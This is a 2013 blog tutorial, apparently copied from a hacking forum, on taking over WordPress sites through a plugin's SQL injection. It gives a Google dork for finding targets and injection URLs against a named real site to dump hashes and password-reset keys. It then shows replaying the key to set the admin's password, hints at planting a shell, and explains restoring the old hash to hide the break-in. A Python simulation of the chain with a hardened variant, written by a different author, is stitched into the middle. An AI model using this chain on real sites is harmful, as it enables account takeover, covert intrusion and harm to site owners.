Monday 25 February 2013

Hack Wordpress without cracking Hashes


OK, so as the title says, I'm going to show you how to hack a WordPress site without cracking the password hashes.

This works with any of the SQL injection exploits ever posted for WordPress themes or plugins, as long as the injection lets you read the wp_users table; the plugin I use below is just one example.

Point to remember:

You cannot use this against the latest WordPress release, 3.4.2, which came out on 6 September 2012.

There are still tons of websites out there that haven't been updated yet.

Earlier versions, the ones that still let you choose a new password on the reset page, can be exploited with this method.


So .. lets start ..


Things you need

1) Any WordPress SQLi dork (exploit-db.com is a good source)
2) Basic knowledge of SQL injection (this thread is not an SQLi tutorial)
3) My help .. hehe


1) My dork

There are a number of SQLi exploits in different WordPress plugins and themes. The one I'm picking is in a plugin called Wp-FacebookConnect,
and the Google dork for it is:

Code:
inurl:"/?fbconnect_action=myhome"


Paste this into google.com (one of my best friends)
and you will see a number of potentially vulnerable websites.

2) The website I'm going to use here is:

Code:
http://masaru.ikeda.me/?fbconnect_action=myhome&userid=2


[IMG]


Here the userid parameter is vulnerable to SQL injection.

So let's see what we can get out of the database.

I'm going to change the URL above to this:

Code:
http://masaru.ikeda.me/?fbconnect_a...a,user_email),7,8,9,10,11,12 from wp_users--


Now you can see we got the username together with the e-mail address.
[IMG]

Now if I change the URL to this:

Code:
http://masaru.ikeda.me/?fbconnect_a...3a,user_pass),7,8,9,10,11,12 from wp_users--


I get the username and the hashed password.
[IMG]

(Note that I'm using concat() here; you can also use group_concat() to pull every user in one row.
Again, how you drive the injection is your own SQLi knowledge.)

Now, we all know that WordPress hashes are not plain MD5: they are phpass portable hashes (the $P$ prefix), salted and iterated MD5, which cracking tools list as MD5(Wordpress).
They take a long time to crack.

But if you're mad, you think outside the box.

So follow these steps:

a) Go to the login page of the WordPress site. In my case that is:

Code:
http://masaru.ikeda.me/wp-login.php


b) Click on "Lost your password?"
[IMG]

c) WordPress now asks for the username or e-mail address of the account whose password you want to reset. In my case that is 'masaru', so go ahead and enter the username.
[IMG]

d) Now look closely: it says "Check your e-mail for the confirmation link."
[IMG]

e) What WordPress actually does is generate an activation key, store it in the user_activation_key column of wp_users, and e-mail a link containing that key to the user. All you have to do is read the key out of the database.

f) So now I change my URL to this to get the activation key:

Code:
http://masaru.ikeda.me/?fbconnect_a...tivation_key),7,8,9,10,11,12 from wp_users--


And there is the activation key. Note it down somewhere.
[IMG]

g) Finally, without ever touching the victim's mailbox, we reset the password. For that, append this to the site URL:

Code:
wp-login.php?action=rp&key=KEYHERE&login=USER NAME HERE


Replace KEYHERE with the activation key you got and USER NAME HERE with the username, which in my case is 'masaru', so my URL becomes:

Code:
http://masaru.ikeda.me/wp-login.php?action=rp&key=cFn9vDsT3X2ZnW8vEda6&login=masaru


And voilà, WordPress asks you for a new password.
[IMG]


Now go back to the login page and try the new password, and there you go, you're in the admin panel.
[IMG]
From there you know how to get a shell on the WordPress site, don't you?

Tricks for those who are actually MAD:

1) To check quickly whether a site runs the latest 3.4.2 or an older version, go to the login page and look for a link back to the blog's front page. In my case it is "<- Back to Digital Way of Living". If that link is there, the site is not 3.4.2; if you don't see it, it is 3.4.2. This check is not official; I figured it out myself and it has worked for me.

[IMG]

2)
Once you have shelled the site, grab the database credentials, connect with any database client, open the wp_users table and put the hash you pulled at the very beginning, the admin's real hash, back into the user_pass column. The password is now what it was before, as if nothing happened; the admin will never know what hit them.

In the latest version, 3.4.2, what actually happens is that after the activation key is confirmed WordPress doesn't let you choose a new password; it e-mails a random password to the user instead.
Yeah, I know it's sad, but don't worry, someone will surely find a new way to work around it.
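To make the whole chain concrete, here is an added example in Python that is mine, not MakMan's and not WordPress code. It simulates the attack against an in-memory SQLite table: the plugin's injectable userid lookup from section 2, the group_concat pull of user_activation_key from step f), the replay of that key in step g), and trick 2) of writing the admin's original hash back. It also shows the hardened variant, where the database holds only an HMAC fingerprint of the key, so a table read gives the attacker nothing replayable. The table layout, the user rows, the fake $P$ hashes and the `KEY_PEPPER` secret are all made up for the example; SQLite has no concat()/0x3a, so `||` and ':' stand in for the MySQL form the page uses.

```python
import hashlib
import hmac
import secrets
import sqlite3

# Constructed stand-in for wp_users; the hashes are fake phpass-looking strings, not real ones.
SEED_USERS = [
    ("masaru", "masaru@example.invalid", "$P$BfakeAdminHashAAAAAAAAAAAAAAAAA"),
    ("editor", "editor@example.invalid", "$P$BfakeEditorHashBBBBBBBBBBBBBBB"),
]
# Assumption: a secret held in the web tier (think wp-config.php), so it is absent from any SQLi dump.
KEY_PEPPER = b"site-secret-kept-out-of-the-database"


def build_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE wp_users (ID INTEGER PRIMARY KEY, user_login TEXT, user_email TEXT,"
                " user_pass TEXT, user_activation_key TEXT DEFAULT '')")
    con.executemany("INSERT INTO wp_users (user_login, user_email, user_pass) VALUES (?, ?, ?)", SEED_USERS)
    # The plugin's own table, which the ?fbconnect_action=myhome page looks up by userid (made up).
    con.execute("CREATE TABLE wp_fbconnect (userid INTEGER, fb_name TEXT, fb_link TEXT)")
    con.execute("INSERT INTO wp_fbconnect VALUES (2, 'Masaru on Facebook', 'https://example.invalid/2')")
    return con


def fbconnect_myhome(con, userid):
    """The vulnerable handler: userid goes into the SQL unquoted and unvalidated."""
    sql = "SELECT userid, fb_name, fb_link FROM wp_fbconnect WHERE userid=" + userid
    return con.execute(sql).fetchall()


# Step f) as one request. The page's MySQL form, with its 12 columns, would be
#   ...&userid=-1 union select 1,2,3,4,5,group_concat(user_login,0x3a,user_activation_key),7,8,9,10,11,12 from wp_users--
# The toy query above has 3 columns, so the UNION pads with 1 and 3; the trailing -- comments out the rest.
PAYLOAD = "-1 UNION SELECT 1,group_concat(user_login||':'||user_activation_key),3 FROM wp_users--"


def key_fingerprint(key):
    """Hardened storage: keep only an HMAC of the key, so a dump of the table cannot be replayed."""
    return hmac.new(KEY_PEPPER, key.encode(), hashlib.sha256).hexdigest()


def retrieve_password(con, login, hash_keys=False):
    """Step e): generate the key, record it in user_activation_key, and 'mail' it (the return value).
    hash_keys=False is the behaviour the page abuses: the raw key is written to the table."""
    key = secrets.token_urlsafe(15)  # 20 characters, the same shape as cFn9vDsT3X2ZnW8vEda6
    stored = key_fingerprint(key) if hash_keys else key
    con.execute("UPDATE wp_users SET user_activation_key=? WHERE user_login=?", (stored, login))
    return key


def reset_password(con, login, key, new_pass_hash, hash_keys=False):
    """Step g): what action=rp&key=...&login=... does once the presented key matches the stored one."""
    row = con.execute("SELECT user_activation_key FROM wp_users WHERE user_login=?", (login,)).fetchone()
    if row is None or not row[0]:
        return False
    presented = key_fingerprint(key) if hash_keys else key
    if not hmac.compare_digest(presented, row[0]):
        return False
    con.execute("UPDATE wp_users SET user_pass=?, user_activation_key='' WHERE user_login=?",
                (new_pass_hash, login))
    return True


def current_hash(con, login):
    return con.execute("SELECT user_pass FROM wp_users WHERE user_login=?", (login,)).fetchone()[0]


def leak_keys(con):
    """Step f) from the attacker's side: pull login:key for every user through the injection point."""
    rows = fbconnect_myhome(con, PAYLOAD)
    return dict(item.split(":", 1) for item in rows[0][1].split(","))


def attack(con, login, new_pass_hash, hash_keys=False):
    """Steps b) to g): request a reset, read the key from the database, replay it on the reset page."""
    retrieve_password(con, login, hash_keys)  # the e-mail goes to the victim; the attacker never sees it
    return reset_password(con, login, leak_keys(con)[login], new_pass_hash, hash_keys)


def restore_hash(con, login, original_hash):
    """Trick 2): write the admin's original hash back so their old password works again."""
    con.execute("UPDATE wp_users SET user_pass=? WHERE user_login=?", (original_hash, login))


if __name__ == "__main__":
    for hardened in (False, True):
        con = build_db()
        before = current_hash(con, "masaru")
        print("hashed keys" if hardened else "raw keys", "-> attacker reset succeeded:",
              attack(con, "masaru", "$P$BattackerChosenHashCCCCCCCCCC", hardened))
        restore_hash(con, "masaru", before)
```

Run it as is and it prints one line per variant. The raw-key variant succeeds because the same string is both what the e-mail carries and what the injection returns; the hashed variant fails because the fingerprint sitting in the table is not what the reset page expects, while the key in the e-mail still works for the real user. The fix on the application side is the same shape whatever the CMS: never store a bearer secret in the form the reset endpoint accepts.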

Thank you for reading this thread. If you run into trouble doing this, hit me up on FB or MSN (contact details in my sig), and don't try it on the same website I used, because I already f***d it. Go and get your own.

2 comments:

  1. At least give credits ..
    http://www.madleets.com/Thread-Hacking-Wordpress-Without-Cracking-the-hashes


    peace .. MakMan